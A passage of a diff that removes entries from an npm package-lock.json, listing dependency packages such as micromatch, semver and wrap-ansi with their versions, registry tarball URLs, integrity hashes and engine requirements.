"resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "dependencies": { - "semver": "^6.0.0" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "dependencies": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "dependencies": { - "mime-db": "1.52.0" - }, - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node_modules/node-releases": { - "version": "2.0.13", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", - "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", - "dev": true - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/p-locate/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "node_modules/picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pretty-format": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.6.1.tgz", - "integrity": "sha512-7jRj+yXO0W7e4/tSJKoR7HRIHLPPjtNaUGG2xxKQnGvPNRkgWcQ0AZX6P4KBRJN4FcTBWb3sa7DVUJmocYuoog==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/proxy-from-env": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", - "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" - }, - "node_modules/pure-rand": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.0.2.tgz", - "integrity": "sha512-6Yg0ekpKICSjPswYOuC5sku/TSWaRYlA0qsXqJgM/d/4pLPHPuTxK7Nbf7jFKzAeedUhR8C7K9Uv63FBsSo8xQ==", - "dev": true, - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/dubzzz" - }, - { - "type": "opencollective", - "url": "https://opencollective.com/fast-check" - } - ] - }, - "node_modules/react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.22.2", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.2.tgz", - "integrity": "sha512-Sb+mjNHOULsBv818T40qSPeRiuWLyaGMa5ewydRLFimneixmVy2zdivRl+AF6jaYPC8ERxGDmFSiqui6SfPd+g==", - "dev": true, - "dependencies": { - "is-core-module": "^2.11.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - }, - "bin": { - "resolve": "bin/resolve" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/update-browserslist-db": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.11.tgz", - "integrity": "sha512-dCwEFf0/oT85M1fHBg4F0jtLwJrutGoHSQXCh7u4o2t1drG+c0a9Flnqww6XUKSfQMPpJBRjU8d4RXB09qtvaA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - }, - "bin": { - "update-browserslist-db": "cli.js" - }, - "peerDependencies": { - "browserslist": ">= 4.21.0" - } - }, - "node_modules/v8-to-istanbul": { - "version": "9.1.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", - "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/v8-to-istanbul/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - 